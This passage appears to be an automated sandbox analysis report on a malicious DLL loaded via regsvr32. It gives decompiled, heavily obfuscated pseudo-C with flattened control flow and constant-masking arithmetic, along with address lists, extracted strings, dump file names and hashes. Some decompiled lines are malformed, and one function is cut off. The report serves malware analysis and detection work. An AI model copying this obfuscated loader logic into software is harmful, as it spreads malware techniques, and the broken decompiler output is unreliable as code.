						} while (_t482 != 0xf14afd2);
						goto L28;
					}
				}
			}

0x1001882f
0x10018835
0x10018842
0x1001884d
0x10018852
0x1001885d
0x10018865
0x10018876
0x1001887a
0x10018882
0x1001888a
0x1001889f
0x100188a2
0x100188aa
0x100188b1
0x100188bc
0x100188c7
0x100188d2
0x100188dd
0x100188f0
0x100188f7
0x10018902
0x1001890a
0x10018912
0x1001891f
0x10018923
0x1001892b
0x10018933
0x10018938
0x10018940
0x10018948
0x1001895b
0x1001895e
0x1001896d
0x10018974
0x1001897f
0x10018987
0x1001898f
0x10018997
0x1001899c
0x100189a4
0x100189ac
0x100189b4
0x100189bc
0x100189c4
0x100189cc
0x100189dc
0x100189e0
0x100189e5
0x100189ed
0x100189f9
0x100189fc
0x10018a00
0x10018a08
0x10018a10
0x10018a1b
0x10018a26
0x10018a31
0x10018a44
0x10018a4b
0x10018a56
0x10018a6c
0x10018a71
0x10018a7a
0x10018a85
0x10018a8d
0x10018a95
0x10018aa1
0x10018aa6
0x10018aac
0x10018ab4
0x10018abc
0x10018ac4
0x10018ad0
0x10018ad5
0x10018adb
0x10018ae3
0x10018aee
0x10018af9
0x10018b04
0x10018b0f
0x10018b1a
0x10018b25
0x10018b2d
0x10018b32
0x10018b3e
0x10018b43
0x10018b49
0x10018b51
0x10018b5c
0x10018b67
0x10018b72
0x10018b7a
0x10018b82
0x10018b87
0x10018b8f
0x10018b97
0x10018b9b
0x10018ba3
0x10018bab
0x10018bb3
0x10018bc0
0x10018bc1
0x10018bc5
0x10018bd2
0x10018bd6
0x10018bde
0x10018be6
0x10018bee
0x10018bf3
0x10018bfb
0x10018c03
0x10018c0b
0x10018c18
0x10018c22
0x10018c26
0x10018c2e
0x10018c39
0x10018c44
0x10018c51
0x10018c5f
0x10018c64
0x10018c6a
0x10018c76
0x10018c7b
0x10018c81
0x10018c89
0x10018c91
0x10018c99
0x10018c9e
0x10018ca3
0x10018cab
0x10018cb6
0x10018cbe
0x10018cc9
0x10018cd1
0x10018cd9
0x10018ce1
0x10018ce9
0x10018cf1
0x10018cf9
0x10018d01
0x10018d09
0x10018d11
0x10018d16
0x10018d1b
0x10018d23
0x10018d2b
0x10018d33
0x10018d3b
0x10018d43
0x10018d4b
0x10018d56
0x10018d61
0x10018d6c
0x10018d77
0x10018d82
0x10018d8d
0x10018d95
0x10018d9a
0x10018d9d
0x10018da1
0x10018da9
0x10018db1
0x10018dbc
0x10018dc7
0x10018dd2
0x10018de2
0x10018de6
0x10018dee
0x10018df6
0x10018dfe
0x10018e03
0x10018e0b
0x10018e10
0x10018e18
0x10018e23
0x10018e35
0x10018e38
0x10018e3c
0x10018e44
0x10018e4f
0x10018e5a
0x10018e65
0x10018e6f
0x10018e77
0x10018e7f
0x10018e8a
0x10018e95
0x10018ea0
0x10018eae
0x10018eb1
0x10018eb8
0x10018ebf
0x10018ec6
0x10018eca
0x10018ed2
0x10018ed7
0x10018edf
0x10018ee7
0x10018eef
0x10018ef7
0x10018eff
0x10018f07
0x10018f07
0x10018f0c
0x10018f0e
0x10018f0f
0x10018f0f
0x10018f0f
0x10018f0f
0x10018f11
0x00000000
0x00000000
0x10018f17
0x1001901a
0x1001901c
0x1001901f
0x10019021
0x00000000
0x10019027
0x10019027
0x1001902c
0x10018f0c
0x10018f0e
0x00000000
0x10018f0e
0x10018f0c
0x10018f1d
0x10018f23
0x1001916b
0x10018f29
0x10018f2f
0x10018f98
0x10018f9f
0x10018f9f
0x10018f0c
0x10018f0e
0x00000000
0x10018f0e
0x10018f31
0x10018f37
0x10018f76
0x10018f7b
0x10018f7e
0x10018f0c
0x10018f0e
0x00000000
0x10018f0e
0x10018f39
0x10018f3f
0x00000000
0x10018f45
0x10018f45
0x10018f4b
0x10018f56
0x10018f53
0x10018f53
0x10018f53
0x10018f5b
0x10018f5e
0x00000000
0x10018f5e
0x10018f3f
0x10018f37
0x10018f2f
0x10018f23
0x10019172
0x10019183
0x10019183
0x1001903c
0x10019042
0x1001913d
0x10019142
0x10019145
0x1001914c
0x00000000
0x10019048
0x10019048
0x1001904e
0x100190e8
0x100190ff
0x10019101
0x10019104
0x10019106
0x10019108
0x10018f0e
0x00000000
0x10018f0e
0x10019054
0x10019054
0x1001905a
0x00000000
0x10019060
0x10019060
0x10019069
0x10019070
0x1001907e
0x10019099
0x100190c1
0x100190d6
0x100190db
0x100190de
0x00000000
0x100190de
0x1001905a
0x1001904e
0x00000000
0x1001914d
0x1001914d
0x1001914d
0x00000000
0x10019159
0x10018f0c

Strings

=X, xrefs: 10018DBC
(*, xrefs: 10018D95
DJP, xrefs: 10018B1A
[Y-:, xrefs: 10018D23
+t, xrefs: 10018D33
E, xrefs: 10018987
i, xrefs: 10018E4F
Mv4, xrefs: 10018CE1
qjZ, xrefs: 10018DE6
.3, xrefs: 10018BA3

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: (*$+t$.3$=X$DJP$Mv4$[Y-:$qjZ$E$i
API String ID: 1725840886-269569919
Opcode ID: 6ecb96cec6f5a8e837fe82f742bf63e709c36496b6322ed753b0b85ffcefabd2
Instruction ID: d359986fd4625fc95595e25bee9756e270b61761606fc70d5a738c0971360466
Opcode Fuzzy Hash: 6ecb96cec6f5a8e837fe82f742bf63e709c36496b6322ed753b0b85ffcefabd2
Instruction Fuzzy Hash: AE220271508380DFE3A4CF65C889A9BBBE1FBC4358F50891DE69986260D7B58989CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10005C9A Relevance: 11.6, Strings: 9, Instructions: 364
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E10005C9A() {
				void* _t374;
				signed int _t379;
				signed int _t384;
				void* _t386;
				signed int _t387;
				intOrPtr _t388;
				void* _t390;
				void* _t401;
				signed int _t406;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				void* _t468;

				 *(_t468 + 0x84) = 0x88682a;
				 *(_t468 + 0x84) =  *(_t468 + 0x84) >> 3;
				_t401 = 0x1034036;
				 *(_t468 + 0x84) =  *(_t468 + 0x84) ^ 0x00110d04;
				 *(_t468 + 0x7c) = 0xf94fe1;
				 *(_t468 + 0x8c) =  *(_t468 + 0x7c) * 0x78;
				 *(_t468 + 0x8c) =  *(_t468 + 0x8c) ^ 0x74dd7179;
				 *(_t468 + 0x44) = 0x123689;
				_t453 = 0x2e;
				 *(_t468 + 0x48) =  *(_t468 + 0x44) / _t453;
				 *(_t468 + 0x48) =  *(_t468 + 0x48) | 0xff74ca21;
				 *(_t468 + 0x48) =  *(_t468 + 0x48) ^ 0xff74ef7e;
				 *(_t468 + 0x14) = 0x3380aa;
				 *(_t468 + 0x14) =  *(_t468 + 0x14) ^ 0x6f60bb82;
				_t454 = 0x6b;
				 *(_t468 + 0x14) =  *(_t468 + 0x14) / _t454;
				 *(_t468 + 0x14) =  *(_t468 + 0x14) ^ 0xe907babf;
				 *(_t468 + 0x14) =  *(_t468 + 0x14) ^ 0xe80de3ac;
				 *(_t468 + 0x40) = 0xd6dba0;
				 *(_t468 + 0x40) =  *(_t468 + 0x40) + 0xeb1c;
				 *(_t468 + 0x40) =  *(_t468 + 0x40) ^ 0x82b67c1c;
				_t455 = 0x45;
				 *(_t468 + 0xa0) =  *(_t468 + 0xa0) & 0x00000000;
				 *(_t468 + 0x40) =  *(_t468 + 0x40) * 0x4c;
				 *(_t468 + 0x40) =  *(_t468 + 0x40) ^ 0xb5036780;
				 *(_t468 + 0x70) = 0xf63b2b;
				 *(_t468 + 0x70) =  *(_t468 + 0x70) << 0xa;
				 *(_t468 + 0x70) =  *(_t468 + 0x70) | 0xff5a898d;
				 *(_t468 + 0x70) =  *(_t468 + 0x70) ^ 0xfff0db9e;
				 *(_t468 + 0x44) = 0x760031;
				 *(_t468 + 0x44) =  *(_t468 + 0x44) >> 4;
				 *(_t468 + 0x44) =  *(_t468 + 0x44) << 6;
				 *(_t468 + 0x44) =  *(_t468 + 0x44) ^ 0x01d4c3e4;
				 *(_t468 + 0x60) = 0xb255ef;
				 *(_t468 + 0x60) =  *(_t468 + 0x60) << 9;
				 *(_t468 + 0x60) =  *(_t468 + 0x60) + 0x70a1;
				 *(_t468 + 0x60) =  *(_t468 + 0x60) ^ 0x64ab7de1;
				 *(_t468 + 0x34) = 0x625ac8;
				 *(_t468 + 0x34) =  *(_t468 + 0x34) / _t455;
				 *(_t468 + 0x34) =  *(_t468 + 0x34) ^ 0xbf9d2a97;
				 *(_t468 + 0x34) =  *(_t468 + 0x34) | 0xf00114e4;
				 *(_t468 + 0x34) =  *(_t468 + 0x34) ^ 0xff9d678f;
				 *(_t468 + 0x78) = 0x4bfab;
				 *(_t468 + 0x78) =  *(_t468 + 0x78) << 8;
				_t456 = 0x2b;
				 *(_t468 + 0x74) =  *(_t468 + 0x78) / _t456;
				 *(_t468 + 0x74) =  *(_t468 + 0x74) ^ 0x0019d34c;
				 *(_t468 + 0x64) = 0xeb484f;
				 *(_t468 + 0x64) =  *(_t468 + 0x64) >> 0xa;
				 *(_t468 + 0x64) =  *(_t468 + 0x64) ^ 0x87844f6e;
				 *(_t468 + 0x64) =  *(_t468 + 0x64) ^ 0x878c4cbe;
				 *(_t468 + 0x1c) = 0x3b5972;
				 *(_t468 + 0x1c) =  *(_t468 + 0x1c) ^ 0x9482ad19;
				 *(_t468 + 0x1c) =  *(_t468 + 0x1c) + 0xffff31ae;
				 *(_t468 + 0x1c) =  *(_t468 + 0x1c) | 0x027a081f;
				 *(_t468 + 0x1c) =  *(_t468 + 0x1c) ^ 0x96f6b5d7;
				 *(_t468 + 0x14) = 0x38dde2;
				 *(_t468 + 0x14) =  *(_t468 + 0x14) >> 8;
				 *(_t468 + 0x14) =  *(_t468 + 0x14) + 0xa8a9;
				 *(_t468 + 0x14) =  *(_t468 + 0x14) ^ 0xb09d829b;
				 *(_t468 + 0x14) =  *(_t468 + 0x14) ^ 0xb09c4a7a;
				 *(_t468 + 0x68) = 0x224a44;
				_t457 = 0x5f;
				_t449 = 0x1a;
				 *(_t468 + 0x68) =  *(_t468 + 0x68) * 0x23;
				 *(_t468 + 0x68) =  *(_t468 + 0x68) ^ 0x060400c8;
				 *(_t468 + 0x68) =  *(_t468 + 0x68) ^ 0x02b1c7da;
				 *(_t468 + 0x60) = 0xfe3948;
				 *(_t468 + 0x60) =  *(_t468 + 0x60) / _t457;
				 *(_t468 + 0x60) =  *(_t468 + 0x60) ^ 0x22dbb269;
				 *(_t468 + 0x60) =  *(_t468 + 0x60) ^ 0x22d7618d;
				 *(_t468 + 0x54) = 0xa97fba;
				_t458 = 0x42;
				 *(_t468 + 0x58) =  *(_t468 + 0x54) * 0x72;
				 *(_t468 + 0x58) =  *(_t468 + 0x58) + 0xffff6c60;
				 *(_t468 + 0x58) =  *(_t468 + 0x58) ^ 0x4b792bf1;
				 *(_t468 + 0x5c) = 0xb4971f;
				 *(_t468 + 0x5c) =  *(_t468 + 0x5c) + 0x8b2a;
				 *(_t468 + 0x5c) =  *(_t468 + 0x5c) >> 0xf;
				 *(_t468 + 0x5c) =  *(_t468 + 0x5c) ^ 0x0000971b;
				 *(_t468 + 0x84) = 0xdd7e32;
				 *(_t468 + 0x84) =  *(_t468 + 0x84) + 0xffff6ef7;
				 *(_t468 + 0x84) =  *(_t468 + 0x84) ^ 0x00de3602;
				 *(_t468 + 0x3c) = 0x160ae5;
				 *(_t468 + 0x3c) =  *(_t468 + 0x3c) / _t449;
				 *(_t468 + 0x3c) =  *(_t468 + 0x3c) | 0x50a7fee5;
				 *(_t468 + 0x3c) =  *(_t468 + 0x3c) / _t458;
				 *(_t468 + 0x3c) =  *(_t468 + 0x3c) ^ 0x0136ffa7;
				 *(_t468 + 0x1c) = 0x80da2d;
				 *(_t468 + 0x1c) =  *(_t468 + 0x1c) >> 0xc;
				 *(_t468 + 0x1c) =  *(_t468 + 0x1c) / _t449;
				 *(_t468 + 0x1c) =  *(_t468 + 0x1c) + 0x783b;
				 *(_t468 + 0x1c) =  *(_t468 + 0x1c) ^ 0x00098127;
				 *(_t468 + 0x2c) = 0xc16b3d;
				 *(_t468 + 0x2c) =  *(_t468 + 0x2c) >> 0xa;
				 *(_t468 + 0x2c) =  *(_t468 + 0x2c) + 0x548f;
				 *(_t468 + 0x2c) =  *(_t468 + 0x2c) >> 0xf;
				 *(_t468 + 0x2c) =  *(_t468 + 0x2c) ^ 0x000c790c;
				 *(_t468 + 0x54) = 0x2e5953;
				 *(_t468 + 0x54) =  *(_t468 + 0x54) + 0x5fb9;
				_t459 = 0x62;
				 *(_t468 + 0x54) =  *(_t468 + 0x54) * 0x44;
				 *(_t468 + 0x54) =  *(_t468 + 0x54) ^ 0x0c62923b;
				 *(_t468 + 0x8c) = 0x8fd603;
				 *(_t468 + 0x8c) =  *(_t468 + 0x8c) >> 0x10;
				 *(_t468 + 0x8c) =  *(_t468 + 0x8c) ^ 0x00064322;
				 *(_t468 + 0x74) = 0x52057a;
				 *(_t468 + 0x74) =  *(_t468 + 0x74) / _t459;
				 *(_t468 + 0x74) =  *(_t468 + 0x74) ^ 0xdf65c205;
				 *(_t468 + 0x74) =  *(_t468 + 0x74) ^ 0xdf67773a;
				 *(_t468 + 0x4c) = 0x9fcd8c;
				 *(_t468 + 0x4c) =  *(_t468 + 0x4c) + 0xffff72fe;
				 *(_t468 + 0x4c) =  *(_t468 + 0x4c) << 0x10;
				 *(_t468 + 0x4c) =  *(_t468 + 0x4c) ^ 0x408b7bf6;
				 *(_t468 + 0x94) = 0xb007b3;
				_t460 = 0x35;
				 *(_t468 + 0x94) =  *(_t468 + 0x94) / _t460;
				 *(_t468 + 0x94) =  *(_t468 + 0x94) ^ 0x0006c845;
				 *(_t468 + 0x24) = 0x993c8b;
				 *(_t468 + 0x24) =  *(_t468 + 0x24) + 0xffff3e4a;
				 *(_t468 + 0x24) =  *(_t468 + 0x24) ^ 0xcd642877;
				 *(_t468 + 0x24) =  *(_t468 + 0x24) ^ 0x4c4b3f4b;
				 *(_t468 + 0x24) =  *(_t468 + 0x24) ^ 0x81bf0054;
				 *(_t468 + 0x9c) = 0x8e20cd;
				 *(_t468 + 0x9c) =  *(_t468 + 0x9c) >> 4;
				 *(_t468 + 0x9c) =  *(_t468 + 0x9c) ^ 0x0005136e;
				 *(_t468 + 0x7c) = 0xe5ead9;
				 *(_t468 + 0x7c) =  *(_t468 + 0x7c) | 0x6951be84;
				 *(_t468 + 0x7c) =  *(_t468 + 0x7c) ^ 0x319a8781;
				 *(_t468 + 0x7c) =  *(_t468 + 0x7c) ^ 0x58672764;
				 *(_t468 + 0x30) = 0xe5a393;
				 *(_t468 + 0x30) =  *(_t468 + 0x30) << 0xc;
				 *(_t468 + 0x30) =  *(_t468 + 0x30) >> 8;
				_t461 = 0xe;
				_t466 =  *(_t468 + 0x7c);
				 *(_t468 + 0x2c) =  *(_t468 + 0x30) / _t461;
				 *(_t468 + 0x2c) =  *(_t468 + 0x2c) ^ 0x000b46cb;
				 *(_t468 + 0x24) = 0xb1c051;
				 *(_t468 + 0x24) =  *(_t468 + 0x24) >> 0xa;
				 *(_t468 + 0x24) =  *(_t468 + 0x24) ^ 0xa5c5c4e6;
				 *(_t468 + 0x24) =  *(_t468 + 0x24) << 0xd;
				 *(_t468 + 0x24) =  *(_t468 + 0x24) ^ 0xbd1d6a08;
				 *(_t468 + 0x34) = 0x5b5ba2;
				 *(_t468 + 0x34) =  *(_t468 + 0x34) + 0x1a4f;
				 *(_t468 + 0x34) =  *(_t468 + 0x34) + 0xfffff092;
				 *(_t468 + 0x34) =  *(_t468 + 0x34) | 0x123422e7;
				 *(_t468 + 0x34) =  *(_t468 + 0x34) ^ 0x1273d504;
				_t450 =  *(_t468 + 0x7c);
				_t399 =  *(_t468 + 0x7c);
				_t462 =  *(_t468 + 0x7c);
				 *(_t468 + 0x4c) = 0x49021f;
				 *(_t468 + 0x4c) =  *(_t468 + 0x4c) << 0xa;
				 *(_t468 + 0x4c) =  *(_t468 + 0x4c) * 0xd;
				 *(_t468 + 0x4c) =  *(_t468 + 0x4c) ^ 0xd46eeb24;
				 *(_t468 + 0x84) = 0xb9acda;
				 *(_t468 + 0x84) =  *(_t468 + 0x84) | 0xec9100b6;
				 *(_t468 + 0x84) =  *(_t468 + 0x84) ^ 0xecbd1adc;
				while(1) {
					L1:
					_t374 = 0xda8ff7c;
					L2:
					while(_t401 != 0x1db27e) {
						if(_t401 == 0x1034036) {
							_t401 = 0xb24c835;
							continue;
						} else {
							if(_t401 == 0x95dad90) {
								_t379 = E1001BF1C( *(_t468 + 0x44),  *((intOrPtr*)(_t468 + 0x6c)),  *((intOrPtr*)(_t468 + 0x38)),  *((intOrPtr*)(_t468 + 0x88)),  *(_t468 + 0xa8) | 0x00000006,  *(_t468 + 0x78), _t468 + 0xa8, 0x2000000, _t401, _t401, 1,  *(_t468 + 0x54));
								_t399 = _t379;
								_t468 = _t468 + 0x28;
								if(_t379 != 0xffffffff) {
									_t401 = 0xec214fe;
									goto L1;
								}
							} else {
								if(_t401 == 0xb24c835) {
									E10009574( *(_t468 + 0x74), _t468 + 0xa8,  *(_t468 + 0x44),  *(_t468 + 0x5c));
									_t384 = E1000FFDE( *(_t468 + 0x40),  *(_t468 + 0x84), _t468 + 0xb4,  *(_t468 + 0x70));
									_t406 =  *(_t468 + 0x24);
									_t466 = _t384;
									_t468 = _t468 + 0x14;
									 *(_t384 - 2) = _t406;
									_t401 = 0x95dad90;
									while(1) {
										L1:
										_t374 = 0xda8ff7c;
										goto L2;
									}
								} else {
									if(_t401 == _t374) {
										_t386 = E1001AB39(_t401,  *((intOrPtr*)(_t468 + 0x6c)),  *(_t468 + 0x48), _t399,  *((intOrPtr*)(_t468 + 0x50)),  *(_t468 + 0x74), _t401, _t450,  *(_t468 + 0xa0),  *(_t468 + 0x84), _t468 + 0xa4, _t462,  *(_t468 + 0x9c), _t401,  *(_t468 + 0x48));
										_t468 = _t468 + 0x34;
										if(_t386 == 0) {
											_t387 =  *(_t468 + 0x9c);
										} else {
											_t464 = _t450;
											L12:
											while(1) {
												if( *((intOrPtr*)(_t464 + 4)) != 4) {
													L14:
													_t390 =  *_t464;
													if(_t390 == 0) {
														_t387 =  *(_t468 + 0x9c);
													} else {
														_t464 = _t464 + _t390;
														continue;
													}
												} else {
													_t313 = _t464 + 0xc; // 0x58672770
													if(E1001589F( *((intOrPtr*)(_t468 + 0x90)),  *((intOrPtr*)(_t468 + 0x20)), _t466, _t313) == 0) {
														_t387 = 1;
														 *(_t468 + 0x9c) = 1;
													} else {
														goto L14;
													}
												}
												_t462 =  *(_t468 + 0x7c);
												goto L20;
											}
										}
										L20:
										if(_t387 == 0) {
											_t374 = 0xda8ff7c;
											_t401 = 0xda8ff7c;
											continue;
										} else {
											_t388 =  *0x10024210; // 0x0
											E10022727( *((intOrPtr*)(_t468 + 0x98)),  *(_t468 + 0x78),  *((intOrPtr*)(_t388 + 4)));
											_t401 = 0x1db27e;
											while(1) {
												L1:
												_t374 = 0xda8ff7c;
												goto L2;
											}
										}
										L32:
									} else {
										if(_t401 == 0xe83107b) {
											E1001E373( *(_t468 + 0x3c), _t399,  *((intOrPtr*)(_t468 + 0x50)),  *(_t468 + 0x84));
										} else {
											if(_t401 != 0xec214fe) {
												L28:
												if(_t401 != 0x820d644) {
													continue;
												} else {
												}
											} else {
												_t462 = 0x1000;
												_push(_t401);
												 *(_t468 + 0x80) = 0x1000;
												_t450 = E1001EAA3(0x1000);
												_t374 = 0xda8ff7c;
												_t401 =  !=  ? 0xda8ff7c : 0xe83107b;
												continue;
											}
										}
									}
								}
							}
						}
						return  *(_t468 + 0x3c);
						goto L32;
					}
					E10006A8D( *(_t468 + 0x2c),  *(_t468 + 0x24), _t450);
					_t401 = 0xe83107b;
					_t374 = 0xda8ff7c;
					goto L28;
				}
			}

0x10005ca0
0x10005cad
0x10005cb5
0x10005cba
0x10005cc5
0x10005cd6
0x10005cdd
0x10005ce8
0x10005cf6
0x10005cfb
0x10005d01
0x10005d09
0x10005d11
0x10005d19
0x10005d25
0x10005d2a
0x10005d30
0x10005d38
0x10005d40
0x10005d48
0x10005d50
0x10005d5d
0x10005d60
0x10005d68
0x10005d6c
0x10005d74
0x10005d7c
0x10005d81
0x10005d89
0x10005d91
0x10005d99
0x10005d9e
0x10005da3
0x10005dab
0x10005db3
0x10005db8
0x10005dc0
0x10005dc8
0x10005dd8
0x10005ddc
0x10005de4
0x10005dec
0x10005df4
0x10005dfc
0x10005e05
0x10005e08
0x10005e0c
0x10005e14
0x10005e1c
0x10005e21
0x10005e29
0x10005e31
0x10005e39
0x10005e41
0x10005e49
0x10005e51
0x10005e59
0x10005e61
0x10005e66
0x10005e6e
0x10005e78
0x10005e80
0x10005e8f
0x10005e92
0x10005e93
0x10005e97
0x10005e9f
0x10005ea7
0x10005eb7
0x10005ebb
0x10005ec3
0x10005ecb
0x10005eda
0x10005edd
0x10005ee1
0x10005ee9
0x10005ef1
0x10005ef9
0x10005f01
0x10005f06
0x10005f0e
0x10005f19
0x10005f24
0x10005f2f
0x10005f3f
0x10005f43
0x10005f53
0x10005f57
0x10005f5f
0x10005f67
0x10005f74
0x10005f78
0x10005f80
0x10005f88
0x10005f90
0x10005f95
0x10005f9d
0x10005fa2
0x10005faa
0x10005fb2
0x10005fbf
0x10005fc2
0x10005fc6
0x10005fce
0x10005fd9
0x10005fe1
0x10005fec
0x10005ffa
0x10005ffe
0x10006006
0x1000600e
0x10006016
0x1000601e
0x10006023
0x1000602d
0x1000603f
0x10006044
0x1000604d
0x10006058
0x10006060
0x10006068
0x10006070
0x10006078
0x10006080
0x1000608b
0x10006093
0x1000609e
0x100060a6
0x100060ae
0x100060b6
0x100060be
0x100060c6
0x100060cb
0x100060d4
0x100060d7
0x100060db
0x100060df
0x100060e7
0x100060ef
0x100060f4
0x100060fc
0x10006101
0x10006109
0x10006111
0x10006119
0x10006121
0x10006129
0x10006131
0x10006135
0x10006139
0x1000613d
0x10006145
0x1000614f
0x10006153
0x1000615b
0x10006166
0x10006171
0x1000617c
0x1000617c
0x1000617c
0x00000000
0x10006181
0x10006193
0x1000635e
0x00000000
0x10006199
0x1000619f
0x10006345
0x1000634a
0x1000634c
0x10006352
0x10006354
0x00000000
0x10006354
0x100061a5
0x100061ab
0x100062d6
0x100062f2
0x100062f7
0x100062fb
0x100062fd
0x10006300
0x10006304
0x1000617c
0x1000617c
0x1000617c
0x00000000
0x1000617c
0x100061b1
0x100061b3
0x10006236
0x1000623b
0x10006240
0x1000627b
0x10006242
0x10006242
0x00000000
0x10006244
0x10006248
0x10006265
0x10006265
0x10006269
0x10006284
0x1000626b
0x1000626b
0x00000000
0x1000626b
0x1000624a
0x1000624e
0x10006263
0x10006271
0x10006272
0x00000000
0x00000000
0x00000000
0x10006263
0x1000628b
0x00000000
0x1000628b
0x10006244
0x1000628f
0x10006291
0x100062b6
0x100062bb
0x00000000
0x10006293
0x10006293
0x100062a6
0x100062ac
0x1000617c
0x1000617c
0x1000617c
0x00000000
0x1000617c
0x1000617c
0x00000000
0x100061b5
0x100061bb
0x100063a0
0x100061c1
0x100061c7
0x10006381
0x10006387
0x00000000
0x00000000
0x1000638d
0x100061cd
0x100061d4
0x100061dd
0x100061e0
0x100061ec
0x100061ee
0x100061fb
0x00000000
0x100061fb
0x100061c7
0x100061bb
0x100061b3
0x100061ab
0x1000619f
0x100063b5
0x00000000
0x100063b5
0x10006371
0x10006377
0x1000637c
0x00000000
0x1000637c

Strings

;x, xrefs: 10005F78
DJ", xrefs: 10005E80
d'gX, xrefs: 100060B6
T, xrefs: 10006078
1, xrefs: 10005D91
K?KL, xrefs: 10006070
rY;, xrefs: 10005E31
OH, xrefs: 10005E14
SY., xrefs: 10005FAA

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID: 1$;x$DJ"$K?KL$OH$SY.$T$d'gX$rY;
API String ID: 3498533004-1719757854
Opcode ID: 1c93353b13e7694cd9c5f022dba772696a7ad9b9ac4c472d7e2890eea44c1b98
Instruction ID: 63c5b4645db505ed228d11bb534cf955a35182ff28ebac8ff7c0ca3f1e5ec7c1
Opcode Fuzzy Hash: 1c93353b13e7694cd9c5f022dba772696a7ad9b9ac4c472d7e2890eea44c1b98
Instruction Fuzzy Hash: 270222715097819FD368CF26C946A5FBBE2FBC8754F10891DF6AA86260C7B18909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000508B Relevance: 11.6, Strings: 9, Instructions: 325
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1000508B(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				unsigned int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t378;
				void* _t379;
				void* _t389;
				intOrPtr _t390;
				void* _t395;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				intOrPtr* _t450;
				void* _t454;
				signed int* _t455;

				_t455 =  &_v160;
				_t450 = __ecx;
				_v4 = __ecx;
				_v140 = 0xc6ead;
				_t454 = 0;
				_t398 = 0x17;
				_v140 = _v140 / _t398;
				_t395 = 0x4f0c58;
				_t399 = 0x62;
				_v140 = _v140 / _t399;
				_v140 = _v140 << 8;
				_v140 = _v140 ^ 0x00016900;
				_v36 = 0xe13c0d;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x709e0680;
				_v120 = 0x5e5db;
				_t400 = 7;
				_v120 = _v120 / _t400;
				_v120 = _v120 >> 0xe;
				_v120 = _v120 >> 0xc;
				_v84 = 0x91aad3;
				_v84 = _v84 << 5;
				_v84 = _v84 + 0x5238;
				_v84 = _v84 ^ 0x1235ac98;
				_v20 = 0xfd66ad;
				_v20 = _v20 + 0xffff6a7c;
				_v20 = _v20 ^ 0x00fcd129;
				_v128 = 0x7c0b25;
				_v128 = _v128 + 0xffff5d5a;
				_v128 = _v128 ^ 0x2c7935eb;
				_v128 = _v128 + 0xffff7565;
				_v128 = _v128 ^ 0x2c04945e;
				_v16 = 0x7c8004;
				_v16 = _v16 + 0xffffb72c;
				_v16 = _v16 ^ 0x007efc46;
				_v112 = 0xb2821c;
				_v112 = _v112 + 0xa87f;
				_v112 = _v112 + 0x3fe5;
				_v112 = _v112 ^ 0x00bee3a9;
				_v32 = 0xef8c7e;
				_v32 = _v32 + 0xffffb8f2;
				_v32 = _v32 ^ 0x00e658b2;
				_v148 = 0x4c2443;
				_t76 =  &_v148; // 0x4c2443
				_t401 = 0x1f;
				_v148 =  *_t76 / _t401;
				_v148 = _v148 + 0xe4a;
				_t402 = 0x33;
				_v148 = _v148 / _t402;
				_v148 = _v148 ^ 0x000715d6;
				_v156 = 0x2b1d2d;
				_v156 = _v156 | 0x55451d85;
				_v156 = _v156 + 0xffff5879;
				_v156 = _v156 ^ 0x60ab47d2;
				_v156 = _v156 ^ 0x35c31aa6;
				_v160 = 0x3bf219;
				_v160 = _v160 + 0x7ca5;
				_v160 = _v160 + 0xffff9c2b;
				_v160 = _v160 | 0x28605479;
				_v160 = _v160 ^ 0x2871564b;
				_v48 = 0x1ced31;
				_v48 = _v48 ^ 0x0ac3b2da;
				_v48 = _v48 ^ 0x0adfc357;
				_v44 = 0x5a57d1;
				_v44 = _v44 + 0xffff53d9;
				_v44 = _v44 ^ 0x0057bfd0;
				_v96 = 0x185efc;
				_t403 = 0x1d;
				_v96 = _v96 / _t403;
				_v96 = _v96 + 0xffffd3fd;
				_v96 = _v96 ^ 0x00019169;
				_v100 = 0xaaa00c;
				_v100 = _v100 >> 4;
				_v100 = _v100 | 0x4d3ca56d;
				_v100 = _v100 ^ 0x4d3aa59f;
				_v80 = 0x815091;
				_v80 = _v80 ^ 0xc8853cef;
				_t404 = 0x2c;
				_v80 = _v80 * 0x2f;
				_v80 = _v80 ^ 0xb8ce74b1;
				_v88 = 0xdbfeac;
				_v88 = _v88 ^ 0x086800eb;
				_v88 = _v88 ^ 0xf927d839;
				_v88 = _v88 ^ 0xf190ae26;
				_v132 = 0xdd1693;
